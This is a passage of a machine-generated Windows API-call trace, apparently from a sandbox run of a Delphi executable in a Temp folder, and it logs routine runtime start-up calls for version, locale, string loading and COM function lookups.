lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0116.441] GetACP () returned 0x4e4 [0116.441] GetCurrentThreadId () returned 0xdf8 [0116.441] GetVersion () returned 0x1db10106 [0116.441] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x201d48, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0116.442] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0116.442] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0116.442] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1300000 [0116.442] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0116.442] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0116.442] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0116.442] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0116.442] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0116.442] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0116.442] GetUserDefaultUILanguage () returned 0x409 [0116.443] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0116.443] GetThreadUILanguage () returned 0x120409 [0116.443] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0116.443] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768) returned 1 [0116.443] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0116.444] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0116.444] GetUserDefaultUILanguage () returned 0x409 [0116.444] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0116.444] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0116.444] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0116.444] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0116.445] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0116.445] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0116.445] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0116.445] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x214520 [0116.446] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0116.446] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0116.446] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0116.446] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0116.446] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0116.446] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0116.446] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13f80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0116.446] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0116.446] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0116.446] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0116.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0116.446] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0116.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0116.446] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0116.446] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0116.446] GetThreadLocale () returned 0x409 [0116.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0116.446] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0116.447] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0116.447] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0116.447] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0116.447] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x214530 [0116.447] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0116.447] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0116.447] GetLastError () returned 0x7a [0116.447] GetLogicalProcessorInformation (in: Buffer=0x13e99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13e99d0, ReturnedLength=0x12fab0) returned 1 [0116.447] GetCurrentThreadId () returned 0xdf8 [0116.447] GetCurrentThreadId () returned 0xdf8 [0116.447] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0116.447] GetThreadLocale () returned 0x409 [0116.447] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0116.449] GetThreadLocale () returned 0x409 [0116.449] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0116.449] GetCurrentThreadId () returned 0xdf8 [0116.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0116.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0116.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0116.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0116.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0116.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0116.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0116.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0116.451] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0116.451] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0116.452] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0116.452] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0116.453] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0116.453] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0116.453] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=17324187627) returned 1 [0116.453] GetTickCount () returned 0x279ef [0116.453] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x2e2)) [0116.453] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x2e2)) [0116.453] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=17324206144) returned 1 [0116.453] GetTickCount () returned 0x279ef [0116.453] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x2e2)) [0116.453] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x2e2)) [0116.453] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13f82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0116.453] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0116.453] 